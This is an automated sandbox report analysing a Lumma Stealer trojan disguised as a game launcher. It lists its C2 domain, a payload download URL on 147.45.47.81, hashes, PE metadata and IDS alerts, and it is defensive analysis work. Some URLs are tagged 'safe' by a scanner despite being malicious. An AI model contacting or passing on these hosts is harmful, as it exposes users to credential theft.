              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Call 0f Duty A1 Launcher.exe45%ReversingLabsWin32.Trojan.Generic
              Call 0f Duty A1 Launcher.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://147.45.47.81/0%Avira URL Cloudsafe
              http://147.45.47.81/conhost.exeZ0%Avira URL Cloudsafe
              https://property-imper.sbs/apij0%Avira URL Cloudsafe
              https://property-imper.sbs:443/apiicrosoft0%Avira URL Cloudsafe
              https://property-imper.sbs/a0%Avira URL Cloudsafe
              http://147.45.47.81/conhost.exec0%Avira URL Cloudsafe
              http://147.45.47.81/40%Avira URL Cloudsafe
              http://147.45.47.81/conhost.exe0%Avira URL Cloudsafe
              http://147.45.47.81:80/conhost.exeK0%Avira URL Cloudsafe
              https://property-imper.sbs/accoC70%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              property-imper.sbs
              104.21.33.116
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://property-imper.sbs/apifalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabCall 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/ac/?q=Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://property-imper.sbs:443/apiicrosoftCall 0f Duty A1 Launcher.exe, 00000003.00000003.2468014022.00000000034E4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoCall 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://property-imper.sbs/apijCall 0f Duty A1 Launcher.exe, 00000003.00000003.2133185254.0000000003572000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://147.45.47.81/Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667480216.0000000003501000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467865552.0000000003501000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiCall 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://ocsp.rootca1.amazontrust.com0:Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://147.45.47.81/conhost.exeCall 0f Duty A1 Launcher.exe, 00000003.00000002.2667678398.0000000003592000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003592000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467635008.0000000003568000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667547897.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.ecosia.org/newtab/Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaCall 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://property-imper.sbs/Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089652859.0000000003573000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003587000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667645205.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCall 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://147.45.47.81/conhost.exeZCall 0f Duty A1 Launcher.exe, 00000003.00000002.2667678398.0000000003592000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003592000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ac.ecosia.org/autocomplete?q=Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://147.45.47.81/conhost.execCall 0f Duty A1 Launcher.exe, 00000003.00000002.2667480216.0000000003501000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467865552.0000000003501000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://147.45.47.81/4Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667480216.0000000003501000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467865552.0000000003501000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgCall 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://property-imper.sbs/aCall 0f Duty A1 Launcher.exe, 00000003.00000003.2112166479.0000000003572000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgCall 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.c.lencr.org/0Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.i.lencr.org/0Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCall 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://property-imper.sbs/accoC7Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003587000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667645205.0000000003587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refCall 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.mozilla.org/products/firefoxgro.allCall 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://147.45.47.81:80/conhost.exeKCall 0f Duty A1 Launcher.exe, 00000003.00000002.2667442328.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2468014022.00000000034E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.33.116
                                                                  property-imper.sbsUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  147.45.47.81
                                                                  unknownRussian Federation
                                                                  2895FREE-NET-ASFREEnetEUfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1561495
                                                                  Start date and time:2024-11-23 15:10:46 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 45s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:6
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Call 0f Duty A1 Launcher.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@4/0@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HCA Information:
                                                                  • Successful, ratio: 83%
                                                                  • Number of executed functions: 14
                                                                  • Number of non-executed functions: 33
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                  • Stop behavior analysis, all processes terminated
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target Call 0f Duty A1 Launcher.exe, PID 4832 because there are no executed function
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: Call 0f Duty A1 Launcher.exe
                                                                  No simulations
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.21.33.116S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                    Aura.exeGet hashmaliciousUnknownBrowse
                                                                      injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                    147.45.47.81Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 147.45.47.81/conhost.exe
                                                                                    n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                    • 147.45.47.81/WinRing0x64.sys
                                                                                    PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                    • 147.45.47.81/WinRing0x64.sys
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 147.45.47.81/conhost.exe
                                                                                    Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 147.45.47.81/conhost.exe
                                                                                    inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                    • 147.45.47.81/conhost.exe
                                                                                    BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                    • 147.45.47.81/WinRing0x64.sys
                                                                                    CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                    • 147.45.47.81/WinRing0x64.sys
                                                                                    XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                    • 147.45.47.81/WinRing0x64.sys
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    property-imper.sbsS#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    Aura.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.33.116
                                                                                    injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 172.67.162.84
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSS#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.155.47
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.223.140
                                                                                    unturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 104.26.13.205
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.70.128
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.155.47
                                                                                    Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.198.61
                                                                                    Aura.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.33.116
                                                                                    FREE-NET-ASFREEnetEUScript.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 147.45.47.81
                                                                                    https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 147.45.178.112
                                                                                    http://147.45.47.98/js/error.jsGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.47.98
                                                                                    hmips.elfGet hashmaliciousUnknownBrowse
                                                                                    • 193.233.193.45
                                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                                    • 193.233.193.45
                                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                                    • 193.233.193.45
                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                    • 193.233.193.45
                                                                                    owari.mips.elfGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.234.212
                                                                                    pdusf6w2SJ.exeGet hashmaliciousRedLineBrowse
                                                                                    • 147.45.44.221
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    a0e9f5d64349fb13191bc781f81f42e1S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    Aura.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.33.116
                                                                                    injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    No context
                                                                                    No created / dropped files found
                                                                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.728754242194129
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Call 0f Duty A1 Launcher.exe
                                                                                    File size:495'616 bytes
                                                                                    MD5:fad119b9db79ccbfe3a65a13f0822b22
                                                                                    SHA1:db0992d62adb36a46b493063dd5192bb27422bb9
                                                                                    SHA256:27550a73b832d92b6a6a3869f0dedbb826c7c97348587342fe02c8c7cf98e0b9
                                                                                    SHA512:41c629c773500fc55b3da2b726045ce88d1f5ae7f35800666c4465bb1d7b8fd3e8aa71e7a99f8c607f64d77916a704e9da7bf0ed2d06844864ad138fe5a2df2f
                                                                                    SSDEEP:12288:SJB+nneDgkXFEIs2Gvih6W8Rd70dDufr3/:2AoR24BhL4r3/
                                                                                    TLSH:60B4F06E3393A0A3E5A3183141D89EB5456E7E300F34A4FB57605BB92F3A6D2C532E17
                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...t.@g............................pX............@.......................................@.................................T...<..
                                                                                    Icon Hash:00928e8e8686b000
                                                                                    Entrypoint:0x415870
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows cui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x6740AA74 [Fri Nov 22 15:59:48 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:0
                                                                                    File Version Major:6
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:887797384d81c493a9d8ee55dad3b2e1
                                                                                    Instruction
                                                                                    call 00007F7D8450579Ah
                                                                                    jmp 00007F7D845055FDh
                                                                                    mov ecx, dword ptr [0042B5F0h]
                                                                                    push esi
                                                                                    push edi
                                                                                    mov edi, BB40E64Eh
                                                                                    mov esi, FFFF0000h
                                                                                    cmp ecx, edi
                                                                                    je 00007F7D84505796h
                                                                                    test esi, ecx
                                                                                    jne 00007F7D845057B8h
                                                                                    call 00007F7D845057C1h
                                                                                    mov ecx, eax
                                                                                    cmp ecx, edi
                                                                                    jne 00007F7D84505799h
                                                                                    mov ecx, BB40E64Fh
                                                                                    jmp 00007F7D845057A0h
                                                                                    test esi, ecx
                                                                                    jne 00007F7D8450579Ch
                                                                                    or eax, 00004711h
                                                                                    shl eax, 10h
                                                                                    or ecx, eax
                                                                                    mov dword ptr [0042B5F0h], ecx
                                                                                    not ecx
                                                                                    pop edi
                                                                                    mov dword ptr [0042B5ECh], ecx
                                                                                    pop esi
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 14h
                                                                                    and dword ptr [ebp-0Ch], 00000000h
                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                    and dword ptr [ebp-08h], 00000000h
                                                                                    push eax
                                                                                    call dword ptr [0042946Ch]
                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                    xor eax, dword ptr [ebp-0Ch]
                                                                                    mov dword ptr [ebp-04h], eax
                                                                                    call dword ptr [00429430h]
                                                                                    xor dword ptr [ebp-04h], eax
                                                                                    call dword ptr [0042942Ch]
                                                                                    xor dword ptr [ebp-04h], eax
                                                                                    lea eax, dword ptr [ebp-14h]
                                                                                    push eax
                                                                                    call dword ptr [004294A8h]
                                                                                    mov eax, dword ptr [ebp-10h]
                                                                                    lea ecx, dword ptr [ebp-04h]
                                                                                    xor eax, dword ptr [ebp-14h]
                                                                                    xor eax, dword ptr [ebp-04h]
                                                                                    xor eax, ecx
                                                                                    leave
                                                                                    ret
                                                                                    mov eax, 00004000h
                                                                                    ret
                                                                                    push 0042C970h
                                                                                    call dword ptr [00429488h]
                                                                                    ret
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    mov al, 01h
                                                                                    ret
                                                                                    push 00030000h
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x292540x3c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x1400.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x237c00xc0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x293c80x138.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x2169a0x2180002aff72e65eaf052f891170e28598361False0.550606343283582data6.737058354414408IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x230000x72640x740091e5fdecc510d2c4e72b1b50db3c2501False0.40641837284482757data4.769873714467996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x2b0000x20680x1000f9b2b4b1f63578440eedd0ace5ac94f1False0.484375OpenPGP Secret Key5.090094544660231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .00cfg0x2e0000x80x200160c8b290b62e5e566d05ce3bec76423False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x2f0000x14000x140029fb367912ce622b91120c5cffd84495False0.81953125data6.557860970753822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    .coS0x310000x4d8000x4d800dadefaca19565602088c9505a810b233False1.0003339213709677data7.999391001565712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    DLLImport
                                                                                    KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                    GDI32.dllCreateEllipticRgn
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-11-23T15:11:39.821460+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.33.116443TCP
                                                                                    2024-11-23T15:11:40.683329+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.33.116443TCP
                                                                                    2024-11-23T15:11:40.683329+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.33.116443TCP
                                                                                    2024-11-23T15:11:42.030345+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.33.116443TCP
